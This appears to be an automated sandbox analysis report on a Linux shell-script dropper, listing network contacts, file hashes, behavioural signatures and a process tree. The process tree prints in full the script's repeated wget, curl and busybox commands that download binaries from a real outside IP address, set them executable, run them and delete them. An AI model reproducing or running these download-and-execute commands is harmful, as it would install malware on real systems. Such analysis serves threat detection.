BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/788-1-0xb678c000-0xb679d044-memory.dmp

memory/804-2-0xb6772000-0xb6783044-memory.dmp

memory/843-3-0xb66cd000-0xb66de044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-21 08:23

Reported

2024-11-21 08:25

Platform

debian9-mipsbe-20240418-en

Max time kernel

57s

Max time network

59s

Command Line

[/tmp/c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 N/A
N/A /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC N/A
N/A /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC N/A
N/A /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 N/A
N/A /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW N/A
N/A /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ N/A
N/A /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 N/A
N/A /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 N/A
N/A /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci N/A
N/A /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 N/A
N/A /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX N/A
N/A /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ N/A
N/A /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil N/A
N/A /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff N/A
N/A /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 N/A
N/A /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 N/A
N/A /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci N/A
N/A /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 N/A
N/A /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX N/A
N/A /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ N/A
N/A /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil N/A
N/A /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff N/A
N/A /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 N/A
N/A /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC N/A
N/A /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC N/A
N/A /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 N/A
N/A /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW N/A
N/A /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /usr/bin/curl N/A
File opened for modification /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /usr/bin/curl N/A
File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /usr/bin/curl N/A
File opened for modification /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /usr/bin/curl N/A
File opened for modification /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /usr/bin/curl N/A
File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /usr/bin/curl N/A
File opened for modification /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /usr/bin/curl N/A
File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /usr/bin/curl N/A
File opened for modification /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /usr/bin/curl N/A
File opened for modification /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /usr/bin/curl N/A
File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /usr/bin/curl N/A
File opened for modification /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /usr/bin/curl N/A
File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /usr/bin/curl N/A
File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /usr/bin/curl N/A
File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /usr/bin/curl N/A
File opened for modification /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /usr/bin/curl N/A
File opened for modification /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /usr/bin/curl N/A
File opened for modification /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /usr/bin/curl N/A
File opened for modification /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /usr/bin/curl N/A
File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /usr/bin/curl N/A
File opened for modification /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /usr/bin/curl N/A
File opened for modification /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /usr/bin/curl N/A
File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /usr/bin/curl N/A
File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /usr/bin/curl N/A
File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /usr/bin/curl N/A
File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /usr/bin/curl N/A
File opened for modification /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /usr/bin/curl N/A
File opened for modification /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /usr/bin/curl N/A

Processes

/tmp/c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh

[/tmp/c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/chmod

[chmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4

[./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/rm

[rm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/usr/bin/wget

[wget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/chmod

[chmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC

[./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/rm

[rm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/usr/bin/wget

[wget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/chmod

[chmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC

[./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/rm

[rm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/usr/bin/wget

[wget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/chmod

[chmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3

[./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/rm

[rm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/usr/bin/wget

[wget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/chmod

[chmod 777 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW

[./UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/rm

[rm UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/usr/bin/wget

[wget http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/bin/chmod

[chmod 777 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ

[./k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/bin/rm

[rm k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/usr/bin/wget

[wget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/chmod

[chmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5

[./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/rm

[rm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/usr/bin/wget

[wget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/chmod

[chmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1

[./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/rm

[rm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/usr/bin/wget

[wget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/chmod

[chmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci

[./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/rm

[rm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/usr/bin/wget

[wget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/chmod

[chmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463

[./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/rm

[rm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/usr/bin/wget

[wget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/chmod

[chmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX

[./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/rm

[rm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/usr/bin/wget

[wget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/chmod

[chmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ

[./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/rm

[rm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/chmod

[chmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil

[./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/rm

[rm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/usr/bin/wget

[wget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/bin/chmod

[chmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff

[./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/bin/rm

[rm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/usr/bin/wget

[wget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/chmod

[chmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5

[./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/rm

[rm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/usr/bin/wget

[wget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/chmod

[chmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1

[./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/rm

[rm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/usr/bin/wget

[wget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/chmod

[chmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci

[./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/rm

[rm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/usr/bin/wget

[wget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/chmod

[chmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463

[./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/rm

[rm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/usr/bin/wget

[wget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/chmod

[chmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX

[./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/rm

[rm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/usr/bin/wget

[wget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/chmod

[chmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ

[./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/rm

[rm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/chmod

[chmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil

[./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/rm

[rm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/usr/bin/wget

[wget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/bin/chmod

[chmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

